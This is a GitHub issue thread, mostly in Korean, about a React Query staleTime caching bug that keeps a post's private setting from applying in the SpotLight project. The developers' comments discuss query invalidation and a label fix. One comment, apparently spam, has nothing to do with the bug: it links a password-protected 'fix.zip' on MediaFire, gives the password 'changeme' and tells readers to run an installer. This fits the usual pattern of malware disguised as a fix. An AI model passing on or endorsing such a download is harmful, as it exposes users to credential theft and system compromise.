### ISSUE TITLE
[BUG] : 비공개 적용 x , stale time 문제

### ISSUE THREAD

**Issue by Wongilk** [Programmers-SpotLight/SpotLight#270]
## ✨ 버그 설명

비공개 설정해두고 다른 페이지 갔다 와도 적용 x
![x-ezgif com-video-to-gif-converter (4)](https://github.com/user-attachments/assets/f3f7dcb6-a955-4bf8-a0a1-6ab7b90f2bd2)

staletime이 있어서 캐시된 데이터를 이용하기 때문인데
비공개, 삭제, 수정했을 때 쿼리 무효화를 해야 할 것 같습니다.

(아니면 staletime을 매우 작게?  낙관적 업데이트를 포기하는 방법도...)

## ✅  예상 해결 방안 

- [ ] 작업 1
- [ ] 작업 2
- [ ] 작업 3

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Eomjihee** [comment]
+비공개 -> 공개로 풀어야할 땐 비공개 설정하기 대신 공개 설정하기로 문구가 나와야할 것 같습니다

**Comment by Wongilk** [comment]
그 부분도 따로 이슈로 만들어두었습니다!
